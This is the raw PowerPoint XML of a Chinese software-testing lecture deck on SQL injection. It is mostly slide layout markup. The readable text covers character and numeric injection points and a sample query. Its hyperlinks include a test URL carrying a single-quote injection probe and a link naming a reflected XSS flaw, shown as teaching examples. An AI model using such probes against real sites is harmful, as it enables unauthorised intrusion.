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Default Extension="png" ContentType="image/png"/>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5346700" cy="3784600"/>
  <p:notesSz cx="5346700" cy="37846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1002" y="1173226"/>
            <a:ext cx="4544695" cy="794766"/>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802005" y="2119376"/>
            <a:ext cx="3742690" cy="9461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 b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="等线"/>
                <a:cs typeface="等线"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Holder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="700" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>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50" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="等线"/>
                <a:cs typeface="等线"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Holder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="2" sz="half"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="267335" y="870458"/>
            <a:ext cx="2325814" cy="2497836"/>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2753550" y="870458"/>
            <a:ext cx="2325814" cy="2497836"/>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48931" y="901446"/>
            <a:ext cx="4384675" cy="2466340"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4384675" h="2466340">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="2465832"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4384662" y="2465832"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4384662" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="191B0E"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="bk object 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3681615" y="2955798"/>
            <a:ext cx="1031240" cy="137160"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1031239" h="137160">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="137159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1031240" y="137159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1031239" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="EFEDE3"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="bk object 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4712855" y="150799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EFEDE3"/>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1250" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="等线"/>
                <a:cs typeface="等线"/>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593" y="24369"/>
            <a:ext cx="5143512" cy="216535"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1250" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="等线"/>
                <a:cs typeface="等线"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Holder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1262767" y="1325364"/>
            <a:ext cx="3442335" cy="916939"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="700" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Holder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="5" sz="quarter"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1817878" y="3519678"/>
            <a:ext cx="1710944" cy="18923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267335" y="3519678"/>
            <a:ext cx="1229741" cy="189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3849624" y="3519678"/>
            <a:ext cx="1229741" cy="189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mailto:bootan@cq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hyperlink" Target="http://www.secbug.org/x.txt" TargetMode="Externa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hyperlink" Target="http://www.secbug.org/xss.php%E5%AD%98%E5%9C%A8XSS%E5%8F%8D%E5%B0%84%E5%9E%8B%E8%B7%A8%E7%AB%99%E6%BC%8F%E6%B4%9E" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.secbug.org&#30340;&#24544;&#23454;&#31881;&#19997;/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.secbug.org/xss.php%E5%AD%98%E5%9C%A8%E5%8F%8D%E5%B0%84%E5%9E%8BXSS%E6%BC%8F%E6%B4%9E" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.xxser.com/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.secbug.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8.jpg"/><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0.jp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26.png"/><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2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9.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3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3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hyperlink" Target="http://www.xxser.com/test.php?id-8" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.xxser.com/test.php?id=8%27" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.xxser.com/test.php?id=8"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8931" y="901446"/>
            <a:ext cx="4384675" cy="2466340"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4384675" h="2466340">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="2465832"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4384662" y="2465832"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4384662" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="EFEDE3"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3681615" y="2954273"/>
            <a:ext cx="1031240" cy="139065"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1031239" h="139064">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="138684"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1031240" y="138684"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1031239" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="191B0E"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4712855" y="150799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191B0E"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1019695" y="1169669"/>
            <a:ext cx="146050" cy="1584325"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="146050" h="1584325">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1584197"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="146050" y="1584197"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="146049" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="191B0E"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1165745" y="1169669"/>
            <a:ext cx="1031240" cy="138430"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1031239" h="138430">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="138302"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1031240" y="138302"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1031240" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="191B0E"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2197620" y="1192783"/>
            <a:ext cx="0" cy="115570"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="0" h="115569">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="115569"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="191B0E"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>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755027" y="907541"/>
            <a:ext cx="4371975" cy="2453005"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12953">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250">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="1905">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2550" spc="35">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>软件测试</a:t>
            </a:r>
            <a:endParaRPr sz="2550">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1624965" marR="1614805" indent="465455">
              <a:lnSpc>
                <a:spcPct val="102699"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="555"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>张程 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Emai</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="sng" sz="750">
                <a:solidFill>
                  <a:srgbClr val="77A2BB"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="77A2BB"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="sng" sz="750" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="77A2BB"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="77A2BB"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="sng" sz="750" spc="-10">
                <a:solidFill>
                  <a:srgbClr val="77A2BB"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="77A2BB"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="sng" sz="750">
                <a:solidFill>
                  <a:srgbClr val="77A2BB"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="77A2BB"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>ta</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="sng" sz="750" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="77A2BB"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="77A2BB"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="sng" sz="750">
                <a:solidFill>
                  <a:srgbClr val="77A2BB"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="77A2BB"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>@c</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="sng" sz="750" spc="-10">
                <a:solidFill>
                  <a:srgbClr val="77A2BB"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="77A2BB"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>q</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="sng" sz="750" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="77A2BB"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="77A2BB"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="sng" sz="750">
                <a:solidFill>
                  <a:srgbClr val="77A2BB"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="77A2BB"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>.ed</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="sng" sz="750" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="77A2BB"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="77A2BB"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="sng" sz="750">
                <a:solidFill>
                  <a:srgbClr val="77A2BB"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="77A2BB"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>.cn </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750">
                <a:solidFill>
                  <a:srgbClr val="77A2BB"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>QQ:80463125</a:t>
            </a:r>
            <a:endParaRPr sz="750">
              <a:latin typeface="Franklin Gothic Book"/>
              <a:cs typeface="Franklin Gothic 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40478"/>
            <a:ext cx="3429635" cy="1998345"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="92710" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="730"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="40">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>注入点类型</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="151130" indent="-139065">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="275"/>
              </a:spcBef>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>字符型注入</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="341630" marR="48895" indent="-138430">
              <a:lnSpc>
                <a:spcPct val="79200"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="254"/>
              </a:spcBef>
              <a:buSzPct val="92307"/>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="342265" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="-40" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>当输入参数为字符串时，如果存在注入漏洞则称为字符型注</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="-50" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>入</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="-40" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>。字符串类型一般要使用单 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="-40" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>引号来闭</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="-50" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>合</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="-40" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>。例如：</a:t>
            </a:r>
            <a:endParaRPr sz="650">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="506095" indent="-138430">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="180"/>
              </a:spcBef>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="506730" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="40">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>数字型注</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>入</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select</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>*</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from</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>table</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where</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id=8</a:t>
            </a:r>
            <a:endParaRPr sz="500">
              <a:latin typeface="Franklin Gothic Book"/>
              <a:cs typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="506095" indent="-138430">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
